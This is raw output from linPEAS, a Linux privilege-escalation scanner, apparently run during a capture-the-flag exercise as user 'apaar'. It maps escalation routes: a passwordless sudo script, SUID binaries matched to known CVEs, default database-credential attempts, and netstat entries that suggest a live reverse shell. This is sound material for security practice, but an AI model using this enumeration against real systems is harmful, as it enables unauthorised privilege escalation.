16K -rwxr-xr-x 1 root root 15K Mar 27 2019 /usr/lib/policykit-1/polkitd
656K -rwxr-xr-x 1 root root 656K Aug 12 21:33 /usr/sbin/apache2
28K -rwxr-xr-x 1 root root 27K Feb 20 2018 /usr/sbin/atd
48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron
24M -rwxr-xr-x 1 root root 24M Jul 20 10:50 /usr/sbin/mysqld
668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd
772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd
168K -rwxr-xr-x 1 root root 165K Feb 5 2018 /usr/sbin/vsftpd
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Oct 3 03:47 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rw-r--r-- 1 root root 589 Jan 14 2020 mdadm
-rw-r--r-- 1 root root 712 Jan 17 2018 php
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 191 Aug 6 22:39 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Oct 3 03:44 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rwxr-xr-x 1 root root 539 Jul 16 2019 apache2
-rwxr-xr-x 1 root root 376 Nov 11 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Aug 6 22:36 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Aug 6 22:36 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Aug 6 22:40 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[+] Services
[i] Search for outdated versions
[ - ] acpid
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ - ] cgroupfs-mount
[ - ] console-setup.sh
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] docker
[ + ] ebtables
[ + ] grub-common
[ - ] hwclock.sh
[ - ] irqbalance
[ + ] iscsid
[ - ] keyboard-setup.sh
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ - ] mdadm
[ - ] mdadm-waitidle
[ + ] mysql
[ - ] open-iscsi
[ - ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ - ] rsync
[ + ] rsyslog
[ - ] screen-cleanup
[ + ] ssh
[ + ] udev
[ + ] ufw
[ + ] unattended-upgrades
[ - ] uuidd
[ + ] vsftpd
[+] Systemd PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
[+] Analyzing .service files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#services
You can't write on systemd PATH so I'm not going to list relative paths executed by services
[+] System timers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Wed 2020-11-25 20:09:00 UTC 49s left Wed 2020-11-25 19:39:01 UTC 29min ago phpsessionclean.timer phpsessionclean.service
Thu 2020-11-26 04:23:01 UTC 8h left Wed 2020-11-25 19:17:47 UTC 50min ago motd-news.timer motd-news.service
Thu 2020-11-26 06:37:34 UTC 10h left Wed 2020-11-25 19:17:47 UTC 50min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2020-11-26 10:11:33 UTC 14h left Wed 2020-11-25 19:17:47 UTC 50min ago apt-daily.timer apt-daily.service
Thu 2020-11-26 19:32:56 UTC 23h left Wed 2020-11-25 19:32:56 UTC 35min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-11-30 00:00:00 UTC 4 days left Wed 2020-11-25 19:17:47 UTC 50min ago fstrim.timer fstrim.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
[+] Analyzing .timer files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
[+] Analyzing .socket files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
[+] HTTP sockets
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
Socket /run/user/1001/snapd-session-agent.socket owned by apaar uses HTTP. Response to /index:
{"type":"error","result":{"message":"method \"GET\" not allowed"}}
Socket /run/snapd.socket owned by root uses HTTP. Response to /index:
{"type":"sync","status-code":200,"status":"OK","result":["TBD"]}
Socket /run/snapd-snap.socket owned by root uses HTTP. Response to /index:
{"type":"error","status-code":401,"status":"Unauthorized","result":{"message":"access denied","kind":"login-required"}}
[+] D-Bus config files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
===================================( Network Information )====================================
[+] Hostname, hosts and DNS
ubuntu
127.0.0.1 localhost
127.0.1.1 ubuntu
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0
search eu-west-1.compute.internal
[+] Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found
[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:34:c5:93:5b txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001
inet 10.10.128.82 netmask 255.255.0.0 broadcast 10.10.255.255
inet6 fe80::d1:81ff:fe9b:b21d prefixlen 64 scopeid 0x20<link>
ether 02:d1:81:9b:b2:1d txqueuelen 1000 (Ethernet)
RX packets 113626 bytes 11438739 (11.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 108336 bytes 43430696 (43.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 176 bytes 15112 (15.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 176 bytes 15112 (15.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default ip-10-10-0-1.eu 0.0.0.0 UG 100 0 0 eth0
10.10.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
ip-10-10-0-1.eu 0.0.0.0 255.255.255.255 UH 100 0 0 eth0
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 docker0
[+] Iptables rules
iptables rules Not Found
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 872 10.10.128.82:22 10.9.5.198:44708 ESTABLISHED -
tcp 0 0 10.10.128.82:54036 10.9.5.198:4455 ESTABLISHED 1956/bash
tcp 0 1 10.10.128.82:39430 91.189.92.41:443 SYN_SENT -
tcp 0 0 10.10.128.82:42186 10.9.5.198:4444 ESTABLISHED -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 10.10.128.82:80 10.9.5.198:46336 FIN_WAIT2 -
tcp6 0 0 10.10.128.82:80 10.9.5.198:41772 ESTABLISHED -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.128.82:68 0.0.0.0:* -
[+] Can I sniff with tcpdump?
No
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
[+] Do I have PGP keys?
[+] Clipboard or highlighted text?
xsel and xclip Not Found
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
Matching Defaults entries for apaar on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User apaar may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
[+] Checking /etc/doas.conf
/etc/doas.conf Not Found
[+] Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
[+] Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[+] Superusers
root:x:0:0:root:/root:/bin/bash
[+] Users with console
anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash
apaar:x:1001:1001:,,,:/home/apaar:/bin/bash
aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash
root:x:0:0:root:/root:/bin/bash
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(aurick) gid=1000(aurick) groups=1000(aurick),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
uid=1002(manurodh) gid=1002(manurodh) groups=1002(manurodh),999(docker)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(mysql) gid=114(mysql) groups=114(mysql)
uid=112(ftp) gid=115(ftp) groups=115(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
[+] Login now
20:08:23 up 50 min, 1 user, load average: 0.19, 0.06, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
apaar pts/2 10.9.5.198 20:06 31.00s 0.16s 0.00s w
[+] Last logons
root tty1 Sat Oct 3 06:40 - crash (1+00:34)
reboot system boot 4.15.0-118-gener Sat Oct 3 06:40 - 14:19 (2+07:38)
apaar pts/1 192.168.184.129 Sat Oct 3 05:41 - 06:10 (00:29)
apaar pts/3 192.168.184.129 Sat Oct 3 05:21 - 05:25 (00:03)
apaar pts/3 192.168.184.129 Sat Oct 3 05:20 - 05:20 (00:00)
aurick pts/0 192.168.184.129 Sat Oct 3 03:43 - crash (02:57)
aurick tty1 Sat Oct 3 03:41 - 05:33 (01:52)
reboot system boot 4.15.0-118-gener Sat Oct 3 03:40 - 14:19 (2+10:38)
wtmp begins Sat Oct 3 03:40:02 2020
[+] Last time logon each user
Username Port From Latest
root tty1 Sun Oct 4 13:13:35 +0000 2020
aurick pts/0 192.168.184.129 Sat Oct 3 03:43:28 +0000 2020
apaar pts/2 10.9.5.198 Wed Nov 25 20:06:59 +0000 2020
[+] Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
===================================( Software Information )===================================
[+] MySQL version
mysql Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using EditLine wrapper
[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
[+] PostgreSQL version and pgadmin credentials
Not Found
[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No
[+] Apache server info
Version: Server version: Apache/2.4.29 (Ubuntu)
Server built: 2020-08-12T21:33:25
[+] Looking for PHPCookies
Not Found
[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found
[+] Looking for Drupal settings.php files
/default/settings.php Not Found
[+] Looking for Tomcat users file
tomcat-users.xml Not Found
[+] Mongo information
Not Found
[+] Looking for supervisord configuration file
supervisord.conf Not Found
[+] Looking for cesi configuration file
cesi.conf Not Found
[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
[+] Looking for Hostapd config file
hostapd.conf Not Found
[+] Looking for wifi conns file
Not Found
[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found
[+] Looking for .vnc directories and their passwd files
.vnc Not Found
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] Looking for .ovpn files and credentials
.ovpn Not Found
[+] Looking for ssl/ssh files
/home/apaar/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
--> Some certificates were found (out limited):
/etc/pollinate/entropy.ubuntu.com.pem
--> /etc/hosts.allow file found, read the rules:
Looking inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No
[+] Looking for Cloud credentials (AWS, Azure, GC)
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found
[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
krb5.conf Not Found
tickets kerberos Not Found
klist Not Found
[+] Looking for Kibana yaml
kibana.yml Not Found
[+] Looking for Knock configuration
Knock.config Not Found
[+] Looking for logstash files
Not Found
[+] Looking for elasticsearch files
Not Found
[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found
[+] Looking for AD cached hashes
cached hashes Not Found
[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /run/screen/S-apaar.
[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found
[+] Looking for Couchdb directory
[+] Looking for redis.conf
[+] Looking for dovecot files
dovecot credentials Not Found
[+] Looking for mosquitto.conf
[+] Looking for neo4j auth file
[+] Looking Cloud-Init conf file
Found readable /etc/cloud/cloud.cfg
lock_passwd: True
groups: [adm, audio, cdrom, dialout, dip, floppy, lxd, netdev, plugdev, sudo, video]
sudo: ["ALL=(ALL) NOPASSWD:ALL"]
[+] Looking Erlang cookie file
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudo ---> /sudo$
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/chsh
/bin/su
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/fusermount
/bin/ping
/bin/umount ---> BSD/Linux(08-1996)
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/bin/bsd-write
/usr/bin/wall
/usr/bin/expiry
/usr/bin/ssh-agent
/usr/bin/mlocate
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/crontab
/usr/bin/chage
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
[+] Writable folders configured in /etc/ld.so.conf.d/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
/usr/local/lib
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr-packet = cap_net_raw+ep
[+] Users with capabilities
[+] Files with ACLs
files with acls in searched folders Not Found
[+] .sh files in path
/usr/bin/gettext.sh
[+] Unexpected folders in root
/cdrom
[+] Files (scripts) in /etc/profile.d/
total 36
drwxr-xr-x 2 root root 4096 Aug 6 22:40 .
drwxr-xr-x 98 root root 4096 Oct 5 14:17 ..
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 825 Jul 10 14:00 apps-bin-path.sh
-rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh
-rwxr-xr-x 1 root root 873 Jun 3 02:08 Z99-cloudinit-warnings.sh
-rwxr-xr-x 1 root root 3417 Jun 3 02:08 Z99-cloud-locale-test.sh
[+] Hashes inside passwd file? ........... No
[+] Hashes inside group file? ............ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read root folder? .............. No
[+] Looking for root files in home dirs (limit 20)
/home
[+] Looking for others files in folders owned by me
[+] Readable files belonging to root and readable by me but not world readable
[+] Modified interesting files in the last 5mins
/home/apaar/.gnupg/trustdb.gpg
/home/apaar/.gnupg/crls.d/DIR.txt
/home/apaar/.gnupg/pubring.kbx
/home/apaar/.ssh/authorized_keys
/home/apaar/log
/home/apaar/.viminfo
/home/apaar/.helpline.sh
/var/log/wtmp
/var/log/syslog
/var/log/lastlog
/var/log/journal/798fcd76739440de8c586719da062c3f/user-1001.journal
/var/log/journal/798fcd76739440de8c586719da062c3f/user-1001@0005b4f3f0e654a5-7b6fd04dd47e3774.journal~
/var/log/journal/798fcd76739440de8c586719da062c3f/system.journal
/var/log/auth.log
/var/log/kern.log
[+] Writable log files (logrotten)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
[+] Files inside /home/apaar (limit 20)
total 340
drwxr-xr-x 5 apaar apaar 4096 Nov 25 20:07 .
drwxr-xr-x 5 root root 4096 Oct 3 04:28 ..
-rw------- 1 apaar apaar 0 Oct 4 14:14 .bash_history
-rw-r--r-- 1 apaar apaar 220 Oct 3 04:25 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct 3 04:25 .bashrc
drwx------ 2 apaar apaar 4096 Oct 3 05:20 .cache
drwx------ 4 apaar apaar 4096 Nov 25 20:08 .gnupg
-rwxrwxr-x 1 apaar apaar 294 Nov 25 20:04 .helpline.sh
-rw-rw-r-- 1 apaar apaar 223835 Sep 4 13:03 linpeas.sh
-rw-rw---- 1 apaar apaar 46 Oct 4 07:25 local.txt
-rw-rw-r-- 1 apaar apaar 75233 Nov 25 20:08 log
-rw-r--r-- 1 apaar apaar 807 Oct 3 04:25 .profile
drwxr-xr-x 2 apaar apaar 4096 Nov 25 20:06 .ssh
-rw------- 1 apaar apaar 1771 Nov 25 20:06 .viminfo
[+] Files inside others home (limit 20)
[+] Looking for installed mail applications
[+] Mails (limit 50)
[+] Backup files?
-rw-r--r-- 1 root root 2765 Aug 6 22:40 /etc/apt/sources.list.curtin.old
[+] Looking for tables inside readable .db/.sqlite files (limit 100)
[+] Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x 4 root root 4.0K Oct 3 04:01 .
drwxr-xr-x 14 root root 4.0K Oct 3 03:44 ..
drwxr-xr-x 3 root root 4.0K Oct 3 04:40 files
drwxr-xr-x 8 root root 4.0K Oct 3 04:40 html
/var/www/files:
total 28K
drwxr-xr-x 3 root root 4.0K Oct 3 04:40 .
[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 root root 2319 Apr 4 2018 /etc/bash.bashrc
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
lrwxrwxrwx 1 root root 41 Aug 6 22:40 /etc/systemd/system/vmtoolsd.service -> /lib/systemd/system/open-vm-tools.service
-rw------- 1 apaar apaar 0 Oct 4 14:14 /home/apaar/.bash_history
Looking for possible passwords inside /home/apaar/.bash_history
-rw-r--r-- 1 apaar apaar 3771 Oct 3 04:25 /home/apaar/.bashrc
-rw-r--r-- 1 apaar apaar 807 Oct 3 04:25 /home/apaar/.profile
-rw-r--r-- 1 root root 3106 Sep 27 2019 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 2889 Dec 4 2017 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 2778 Aug 13 2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 802 Aug 13 2017 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 1531 Oct 3 03:40 /etc/apparmor.d/cache/.features
-rw------- 1 root root 12288 Oct 3 06:35 /etc/.sudoers.swp
-rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout
-rw------- 1 root root 12288 Oct 4 13:37 /etc/.sudoers.swo
-rw------- 1 root root 0 Aug 6 22:35 /etc/.pwd.lock
-rw-r--r-- 1 apaar apaar 220 Oct 3 04:25 /home/apaar/.bash_logout
-rw------- 1 apaar apaar 1771 Nov 25 20:06 /home/apaar/.viminfo
-rwxrwxr-x 1 apaar apaar 294 Nov 25 20:04 /home/apaar/.helpline.sh
-rw-r--r-- 1 root root 962 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 83719 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/.cache.mk
-rw-r--r-- 1 root root 1980 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.subcmd-config.o.cmd
-rw-r--r-- 1 root root 8225 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.orc_dump.o.cmd
-rw-r--r-- 1 root root 1841 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.objtool-in.o.cmd
-rw-r--r-- 1 root root 7348 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.builtin-orc.o.cmd
-rw-r--r-- 1 root root 5720 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.libstring.o.cmd
-rw-r--r-- 1 root root 7804 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.run-command.o.cmd
-rw-r--r-- 1 root root 6672 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.pager.o.cmd
-rw-r--r-- 1 root root 5020 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.fixdep.o.cmd
-rw-r--r-- 1 root root 7911 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.orc_gen.o.cmd
-rw-r--r-- 1 root root 5769 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.sigchain.o.cmd
-rw-r--r-- 1 root root 6797 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.help.o.cmd
-rw-r--r-- 1 root root 435 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.fixdep-in.o.cmd
-rw-r--r-- 1 root root 4346 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.str_error_r.o.cmd
-rw-r--r-- 1 root root 6307 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.exec-cmd.o.cmd
-rw-r--r-- 1 root root 7798 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.special.o.cmd
-rw-r--r-- 1 root root 6267 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.objtool.o.cmd
-rw-r--r-- 1 root root 6097 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.parse-options.o.cmd
-rw-r--r-- 1 root root 7987 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.check.o.cmd
-rw-r--r-- 1 root root 4130 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.fixdep.o.d
-rw-r--r-- 1 root root 464 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/arch/x86/.objtool-in.o.cmd
-rw-r--r-- 1 root root 8571 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/arch/x86/.decode.o.cmd
-rw-r--r-- 1 root root 1283 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.libsubcmd-in.o.cmd
-rw-r--r-- 1 root root 7086 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.builtin-check.o.cmd
